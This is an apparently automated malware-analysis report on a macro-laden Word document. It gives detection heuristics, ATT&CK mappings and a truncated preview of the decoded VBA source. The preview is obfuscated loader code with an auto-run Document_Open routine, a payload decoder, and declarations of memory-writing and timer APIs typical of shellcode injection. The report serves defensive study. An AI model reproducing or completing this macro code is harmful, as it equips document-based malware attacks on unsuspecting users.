MALICIOUS
122
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The ClamAV heuristic also flags it as a downloader. While the VBA code is obfuscated, the presence of a Document_Open macro and the downloader heuristic strongly suggest it's designed to fetch and execute further malicious content. No specific family could be identified.
Heuristics 4
-
ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12238 bytes |
SHA-256: 441c04f2853a3537759cd73f044be137a5f8ecb83d23bf14a6278bc04b8d0f1e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() monolithic nability = 30 + 25 Pmt 0, nability, 13170, 22451, 5 End Sub Attribute VB_Name = "sustainability" Function prompting(clinal) As String Dim page(6962) As Byte quicker = "trialanderror" Dim centrex As Long Dim insider As Long Dim deadlocked(63) As Long Dim malcolmia() As Byte Dim alloyed(63) As Long Dim sutler As String Dim antisemitic As Integer Dim adonize As Long Dim aneides As Long Dim debole(63) As Long disputare = 23 - 4 + 45 grass = 16 - 104 + 4184 hamiform = 77 - 42 + 16711645 cutworm = 104 - 23 + 174 Dim leechcraft As String adapid = 125 - 19 + 65174 bloomer = 32 - 99 + 130 parsiism = 105 - 7 + 262046 nymphet = 13 - 107 + 65630 attached = 67 - 7 + 16515012 cyclical = 75 - 122 + 303 kuchean = 22 - 10 + 258036 Dim baby As Byte Dim majorca As Variant herr = 83 - 104 + 4053 Dim agkistrodon As Integer antiinflammatory = 23 - 1 + 7821 Dim cognizance() As Byte cognizance = VBA.StrConv(clinal, 120 + 8) bellpull = 59 + 18 Pmt 0, bellpull, 16141, 29307, 2 multipartite = 7843 nolle = vbKeyShift - 12 For abrasion = 0 To multipartite If abrasion Mod 2 = 0 Then cognizance(abrasion) = cognizance(abrasion) - nolle Else cognizance(abrasion) = cognizance(abrasion) - (nolle - 1) End If Next abrasion casting = 19 + 23 Pmt 0, casting, 11357, 52754, 5 antisemitic = 0 weregild = lonas For centrex = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) deadlocked(centrex) = anthem(centrex, disputare, 39) debole(centrex) = anthem(centrex, grass, 39) alloyed(centrex) = anthem(centrex, parsiism, 39) Next centrex myopus = 56 + 37 Pmt 0, myopus, 2095, 15697, 7 malcolmia = cognizance shines = 2 - 70 + 72 pa = 20 + 38 Pmt 0, pa, 22816, 13328, 8 deliver = 4 - 38 + 37 stern = Fix(207) stern = Rnd(110) coverture = deliver + 1 cacodylic = 48 - 77 + 31 For adonize = 0 To multipartite panhandler = malcolmia(adonize) colloquialism = malcolmia(adonize + 2) brier = debole(weregild(malcolmia(adonize + 1))) bract = deadlocked(weregild(colloquialism)) + weregild(malcolmia(adonize + deliver)) insider = alloyed(weregild(panhandler)) + brier + bract centrex = anthem(insider, hamiform, 31) page(aneides) = anthem(centrex, nymphet, 21) centrex = anthem(insider, adapid, 31) page(aneides + 1) = anthem(centrex, cyclical, 21) page(aneides + cacodylic) = anthem(insider, cutworm, 31) aneides = aneides + cacodylic + 1 adonize = adonize + 3 Next prompting = page End Function Attribute VB_Name = "samui" #If (19 - 123 + 504 + 30 - 7 + 277) > ((62 - 30 + 288) - (92 - 114 + 562) * 1) And ((33 - 30 + 25) - (118 - 15 - 75)) * 2 < (Win64) Then Public Declare PtrSafe Function assumiing _ Lib "Shlwapi.dll " Alias _ "GetOverlappedResult" (ByVal minotaur As Any, kennel As Any, stranger As Any, closepacked As Any) As LongPtr Public Declare PtrSafe Function necropsy _ Lib "Ntdll " Alias _ "NtWriteVirtualMemory" (ByVal purveyance As Any, ByVal haymaker As Any, ByVal barter As Any, ByVal iconography As Any, ByVal aminoaciduria As Any) As LongPtr #ElseIf (58 - 95 + 437 + 111 - 25 + 214) > ((116 - 109 + 313) - (92 - 7 + 455) * 1) And Not ((45 - 44 + 27) - (94 - 11 - 55)) * 2 < (Win64) Then Public Declare Function disjointedly _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (axially As Any, ByVal prolongation As Any, ByVal countersign As Any, ByVal facsimile As Any, ByVal atlantes As Any, ByVal benin As Any, ByVal forfeited As Any) As Long Public Declare Function dough _ Lib "Shlwapi.dll " Alias _ "SleepConditionVariableSRW" (ByVal postnate As Any, affectibility As Any, octuple As Any, deviating As Any) As Long #End If Function lonas() Dim elamitic(255) As Byte consolidated = 124 - 10 - 49 For i = consolidated To (8 - 123 + 206) ela ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.